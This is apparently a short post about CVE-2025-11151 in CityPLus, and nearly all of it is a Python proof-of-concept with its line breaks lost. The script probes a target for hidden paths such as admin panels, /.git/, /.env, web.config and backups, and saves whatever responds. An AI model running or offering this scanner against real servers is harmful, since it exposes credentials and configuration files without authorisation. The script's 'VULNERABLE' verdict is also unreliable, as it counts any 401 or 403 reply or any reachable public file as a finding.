CVE-2025-11151：CityPLus敏感信息泄露漏洞

# CVE-2025-11151 PoC - CityPLus Unpublished Web Page Detection # This PoC demonstrates how to detect unpublished/hidden web pages in CityPLus import requests import sys from urllib.parse import urljoin TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-cityplus-server" # Common unpublished/hidden page paths commonly found in CityPLus HIDDEN_PATHS = [ "/admin/", "/admin/login.aspx", "/yonetim/", "/yonetim/giris.aspx", "/panel/", "/internal/", "/debug/", "/test/", "/backup/", "/config/", "/api/", "/api/v1/", "/private/", "/hidden/", "/system/", "/management/", "/dashboard/", "/reports/", "/logs/", "/temp/", "/uploads/", "/files/", "/db/", "/database/", "/setup/", "/install/", "/status/", "/health/", "/info/", "/phpinfo.php", "/server-status", "/server-info", "/.git/", "/.env", "/web.config", "/sitemap.xml", "/robots.txt" ] def detect_unpublished_pages(base_url): """Detect unpublished web pages in CityPLus application""" print(f"[*] Scanning target: {base_url}") print(f"[*] CVE-2025-11151 - CityPLus Unpublished Page Detection") print("-" * 60) found_pages = [] session = requests.Session() session.headers.update({ "User-Agent": "Mozilla/5.0 (compatible; SecurityScanner/1.0)" }) for path in HIDDEN_PATHS: url = urljoin(base_url, path) try: response = session.get(url, timeout=10, allow_redirects=False) # Check for accessible unpublished pages if response.status_code == 200: # Check if response contains sensitive content content_length = len(response.content) if content_length > 0: print(f"[+] FOUND: {url} - Status: {response.status_code} - Size: {content_length} bytes") found_pages.append({ "url": url, "status": response.status_code, "size": content_length }) elif response.status_code == 403: print(f"[!] FORBIDDEN: {url} - Page exists but access denied") found_pages.append({ "url": url, "status": response.status_code, "size": 0 }) elif response.status_code == 401: print(f"[!] AUTH REQUIRED: {url} - Authentication required") found_pages.append({ "url": url, "status": response.status_code, "size": 0 }) except requests.exceptions.RequestException as e: pass print("-" * 60) print(f"[*] Scan complete. Found {len(found_pages)} potentially sensitive pages.") if found_pages: print("\n[!] VULNERABLE - Unpublished pages detected!") print("[!] Affected versions: CityPLus before V24.29500.1.0") return found_pages if __name__ == "__main__": results = detect_unpublished_pages(TARGET_URL) # Export results if results: with open("cityplus_exposed_pages.txt", "w") as f: for page in results: f.write(f"{page['url']} - Status: {page['status']}\n") print(f"\n[*] Results saved to cityplus_exposed_pages.txt")